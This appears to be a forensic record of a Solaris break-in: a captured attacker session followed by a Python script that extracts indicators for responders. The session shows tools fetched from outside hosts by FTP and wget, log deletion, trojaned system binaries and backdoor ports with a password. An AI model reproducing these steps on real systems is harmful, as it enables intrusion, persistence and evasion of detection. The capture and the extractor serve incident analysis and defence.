Diagram of attack: 1
List of commands used by the attacker to install backdoors, etc. (captured session; the attacker's own typing and the system's responses are interleaved as they appeared on the wire)
# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
# wget
wget: not found
# w
  9:44am  up 13 day(s),  4:24,  0 users,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
# /bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
#
#
# ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka
get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp       ipv6sun   solbnc    wget
# chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58--  http://62.211.66.53:80/bobzz/sol.tar.gz
           => `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]

 1800K -> .......... .......... .......... ..........            [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

# rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
# cd sol
sol: does not exist
# ./setup
./setup: not found
# cd sol
sol: does not exist
# tar -xf sol.tar.gz
# cd sol
# ./setup
bobz oN ircNet on join #privè
[ASCII-art banner, repeated twice: "Autor: bobz"]
...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...
Ti:AmO:RosariA
Delete Logz...
------- Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
--- LogZ Cancellati...
Delete LogZ by warning
* Starting up at: 1038585350
* Installing from /usr/share/man/man1/.old/sol
  - Will erase /usr/share/man/man1/.old/sol after install
* Checking for existing rootkits..
* Checking for existing rootkits..
* checking /etc/rc2 and /etc/rc3 for rootkits...
* Rootkits Removed from config files
* checking crond configs for rootkits...
* Rootkits Removed from crond config files
*** WARNING *** 2 suspicious files found in /dev
*** Insert Rootkit Password : mixer
*** Using Password mixer
*** Insert Rootkit SSH Port : 5001
*** Using Port 5001
*** Insert Rootkit PsyBNC Port : 7000
*** Using Port 7000
File processed...
* Making backups... su ping du passwd find ls netstat strings ps Done.
* Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
* Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
* Starting Patcher...
* Patching... DTSCD PATCHED LPD PATCHED fingerd cmsd ttdbserverd sadmind statd rquotad rusersd cachefsd bindshells snmpXdmid Done.
--09:56:21--  ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
           => `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

    0K -> .......... .......... ......                           [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive:  111085-02.zip
   creating: 111085-02/
  inflating: 111085-02/.diPatch
   creating: 111085-02/SUNWcsu/
  inflating: 111085-02/SUNWcsu/pkgmap
  inflating: 111085-02/SUNWcsu/pkginfo
   creating: 111085-02/SUNWcsu/install/
  inflating: 111085-02/SUNWcsu/install/checkinstall
  inflating: 111085-02/SUNWcsu/install/copyright
  inflating: 111085-02/SUNWcsu/install/i.none
  inflating: 111085-02/SUNWcsu/install/patch_checkinstall
  inflating: 111085-02/SUNWcsu/install/patch_postinstall
  inflating: 111085-02/SUNWcsu/install/postinstall
  inflating: 111085-02/SUNWcsu/install/preinstall
   creating: 111085-02/SUNWcsu/reloc/
   creating: 111085-02/SUNWcsu/reloc/usr/
   creating: 111085-02/SUNWcsu/reloc/usr/bin/
  inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
  inflating: 111085-02/README.111085-02

Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.
Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.

--09:56:49--  ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
           => `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

 1000K -> ....................................................    [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive:  108949-07.zip
   creating: 108949-07/
  inflating: 108949-07/.diPatch
  inflating: 108949-07/postbackout
   creating: 108949-07/SUNWdtbas/
  inflating: 108949-07/SUNWdtbas/pkgmap
  inflating: 108949-07/SUNWdtbas/pkginfo
   creating: 108949-07/SUNWdtbas/install/
  inflating: 108949-07/SUNWdtbas/install/checkinstall
  inflating: 108949-07/SUNWdtbas/install/copyright
  inflating: 108949-07/SUNWdtbas/install/depend
  inflating: 108949-07/SUNWdtbas/install/i.none
  inflating: 108949-07/SUNWdtbas/install/patch_checkinstall
  inflating: 108949-07/SUNWdtbas/install/patch_postinstall
  inflating: 108949-07/SUNWdtbas/install/postinstall
  inflating: 108949-07/SUNWdtbas/install/preinstall
   creating: 108949-07/SUNWdtbas/reloc/
   creating: 108949-07/SUNWdtbas/reloc/dt/
   creating: 108949-07/SUNWdtbas/reloc/dt/lib/
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1
   creating: 108949-07/SUNWdtbax/
  inflating: 108949-07/SUNWdtbax/pkgmap
  inflating: 108949-07/SUNWdtbax/pkginfo
   creating: 108949-07/SUNWdtbax/install/
  inflating: 108949-07/SUNWdtbax/install/checkinstall
  inflating: 108949-07/SUNWdtbax/install/copyright
  inflating: 108949-07/SUNWdtbax/install/depend
  inflating: 108949-07/SUNWdtbax/install/i.none
  inflating: 108949-07/SUNWdtbax/install/patch_checkinstall
  inflating: 108949-07/SUNWdtbax/install/patch_postinstall
  inflating: 108949-07/SUNWdtbax/install/postinstall
  inflating: 108949-07/SUNWdtbax/install/preinstall
   creating: 108949-07/SUNWdtbax/reloc/
   creating: 108949-07/SUNWdtbax/reloc/dt/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1
  inflating: 108949-07/postpatch
  inflating: 108949-07/README.108949-07

Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWdtbas> was successful.

Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWdtbax> was successful.

Archive:  111606-02.zip
   creating: 111606-02/
  inflating: 111606-02/.diPatch
   creating: 111606-02/SUNWftpu/
  inflating: 111606-02/SUNWftpu/pkgmap
  inflating: 111606-02/SUNWftpu/pkginfo
   creating: 111606-02/SUNWftpu/install/
  inflating: 111606-02/SUNWftpu/install/checkinstall
  inflating: 111606-02/SUNWftpu/install/copyright
  inflating: 111606-02/SUNWftpu/install/i.none
  inflating: 111606-02/SUNWftpu/install/patch_checkinstall
  inflating: 111606-02/SUNWftpu/install/patch_postinstall
  inflating: 111606-02/SUNWftpu/install/postinstall
  inflating: 111606-02/SUNWftpu/install/preinstall
   creating: 111606-02/SUNWftpu/reloc/
   creating: 111606-02/SUNWftpu/reloc/usr/
   creating: 111606-02/SUNWftpu/reloc/usr/sbin/
  inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
  inflating: 111606-02/README.111606-02

Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWftpu> was successful.

PS Trojaned
* Primary network interface is of type: hme
* Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README Done.
* psyBNC has now been configured on port 7000 (default) with no IDENT
* erasing rootkit...
./setup: test: unknown operator 16
# ./startbnc
[psyBNC ASCII-art banner]
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
* psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
------- Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
--- LogZ Cancellati...
Delete LogZ by bobbino
    root   167     1  0   Nov 16 ?        0:00 /usr/sbin/inetd -s
    root  3325  3265  0 10:02:25 ?        0:00 grep inetd
--- Patch..... Attivata by RyO
#
#
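A captured session like the one above is, for the responder, a source of indicators: the staging host and download URL, the hidden working directory, the ports the rootkit's SSH backdoor and psyBNC listen on, the binaries replaced with trojaned copies, and the PID of the bouncer. The following is an added example, not part of the original capture or of any tool it mentions: a small Python extractor that walks a transcript line by line and collects those indicators so they can be fed into host triage or network monitoring. The SESSION string is a constructed excerpt containing only the transcript lines that carry indicators; the regexes and the Indicators type are this example's own design, and the extractor generalises to any transcript with the same wget/psyBNC/rootkit-installer output style.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: excerpts of the captured session above,
# trimmed to the lines that carry indicators (not the full transcript).
SESSION = """\
# mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# ftp 62.211.66.16 21
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
*** Using Port 5001
*** Using Port 7000
* Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
"""

# Patterns are written for the output styles seen in the transcript:
# wget-style URLs, "Port NNNN" / "port NNNN" lines from the installer and
# psyBNC, a hidden (dot-prefixed) directory component, the installer's
# "Installing trojans... <names> Complete." line, and psyBNC's PID line.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"""\b(?:https?|ftp)://[^\s'"`]+""")
PORT = re.compile(r"\bport (\d{1,5})\b", re.IGNORECASE)
HIDDEN_PATH = re.compile(r"(/\S*/\.[A-Za-z0-9_-]\S*)")
TROJANS = re.compile(r"Installing trojans\.\.\.\s+(.*?)\s+Complete\.")
PID = re.compile(r"started \(PID (\d+)\)")


@dataclass
class Indicators:
    """Indicators recovered from one attacker session transcript."""
    remote_hosts: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    listen_ports: set = field(default_factory=set)
    hidden_paths: set = field(default_factory=set)
    trojaned_binaries: list = field(default_factory=list)
    pids: set = field(default_factory=set)


def extract_indicators(text: str) -> Indicators:
    """Scan a transcript and collect network and host indicators."""
    ind = Indicators()
    for line in text.splitlines():
        ind.urls.update(URL.findall(line))
        for ip in IPV4.findall(line):
            if ip != "0.0.0.0":  # wildcard bind address, not a remote host
                ind.remote_hosts.add(ip)
        ind.listen_ports.update(int(p) for p in PORT.findall(line))
        ind.hidden_paths.update(HIDDEN_PATH.findall(line))
        trojans = TROJANS.search(line)
        if trojans:
            ind.trojaned_binaries = trojans.group(1).split()
        ind.pids.update(int(p) for p in PID.findall(line))
    return ind


def summarize(ind: Indicators) -> dict:
    """Sorted, JSON-friendly view of the indicators for a triage report."""
    return {
        "remote_hosts": sorted(ind.remote_hosts),
        "urls": sorted(ind.urls),
        "listen_ports": sorted(ind.listen_ports),
        "hidden_paths": sorted(ind.hidden_paths),
        "trojaned_binaries": list(ind.trojaned_binaries),
        "pids": sorted(ind.pids),
    }


if __name__ == "__main__":
    for key, value in summarize(extract_indicators(SESSION)).items():
        print(f"{key}: {value}")
```

The trojaned-binary list is the most actionable output: each name should be compared against the package database or a known-good checksum set on the victim, and the hidden path and listening ports give the file-system and `netstat` checks for any other host suspected of the same kit.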